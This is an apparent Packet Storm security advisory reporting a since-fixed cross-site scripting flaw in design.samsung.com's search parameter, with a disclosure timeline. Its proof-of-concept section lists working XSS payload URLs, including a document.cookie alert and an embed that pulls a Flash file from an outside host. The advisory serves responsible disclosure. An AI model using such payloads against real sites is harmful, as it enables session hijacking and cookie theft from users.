Samsung Cross Site Scripting

2014-06-11T00:00:00
ID PACKETSTORM:127048
Type packetstorm
Reporter Robert Garcia
Modified 2014-06-11T00:00:00

Description

                                        
                                            `  
****************************************************************************  
***************************************  
Advisory: design.samsung.com– Cross-Site Script Vulnerability (XSS) Advisory  
ID: 03062014  
Author: Roberto Garcia (@1gbDeInfo)  
Affected Software: Successfully tested on design.samsung.com Vendor URL:  
http://www.design.samsung.com Vendor Status: informed and solved  
****************************************************************************  
***************************************  
  
  
**************************  
Vulnerability Description  
**************************  
  
The website " design.samsung.com " is prone to a XSS vulnerability.  
  
This vulnerability involves the ability to inject arbitrary and unauthorized  
javascript code. A malicious script inserted into a page in this manner can  
hijack the user’s session, submit unauthorized transactions as the user,  
steal confidential information, or simply deface the page.  
  
  
**************************  
PoC-Exploit  
**************************  
  
  
http://www.design.samsung.com/global/#search?q=data:text/html,/*%3Cimg%20src  
=x%20%27-alert%280%29-%27%20onerror=alert%281%29%3E*/alert%281%29  
  
http://www.design.samsung.com/global/#search?q=http://goo.gl/58yW2K  
  
  
http://www.design.samsung.com/global/#search?q=%3Cembed/src=//v.ifeng.com/in  
clude/exterior.swf?AutoPlay=false&guid=045d77fb-6777-405f-8b66-5bd85afc16ea%  
20allowScriptAccess=always%3E  
  
  
http://www.design.samsung.com/global/#search?q=%E2%80%9C%3E%3Cscript%3Ealert  
%28document.cookie%29%3C/script%3E  
  
PoC video is available at  
https://mega.co.nz/#F!Ot5kERSS!5If3znRA2IOnAOrMZAAnlw  
  
  
**************************  
Solution  
**************************  
  
Solved, but have not notified me anything  
  
**************************  
Disclosure Timeline  
**************************  
  
- Report vuln Jun 03, 2014 via email to askdesign@samsung.com. I sent a  
video with the POC.  
- Website revised June 10. Solved, but nobody tells me  
  
**************************  
Credits  
**************************  
  
Vulnerability found and advisory written by Roberto Garcia  
  
  
Best regards.  
  
Roberto Garcia Amoriz  
  
Linkedin: es.linkedin.com/in/rogaramo/  
Web: http://www.1gbdeinformacion.com  
Twitter: @1gbdeinfo  
  
  
  
  
  
`